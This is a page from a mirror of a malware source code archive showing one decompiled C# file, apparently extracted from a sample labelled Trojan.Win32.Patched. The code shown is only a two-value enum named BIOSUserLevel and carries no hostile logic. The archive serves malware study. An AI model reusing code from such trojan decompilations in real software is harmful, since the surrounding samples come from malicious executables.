mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
f2ac1ece55
add
15 lines
488 B
C#
15 lines
488 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: eSettings.Model.Library.BIOSUserLevel
|
|
// Assembly: eRecoveryService, Version=2.5.3.6, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 08DF666A-8C92-4CCB-869A-390134BB6787
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-d8d6de6a708417645ef396f90e846eda5ae240e20dd2ceba0b7c9c1e4a6a7d77.exe
|
|
|
|
namespace eSettings.Model.Library
|
|
{
|
|
public enum BIOSUserLevel
|
|
{
|
|
USER,
|
|
ADMIN,
|
|
}
|
|
}
|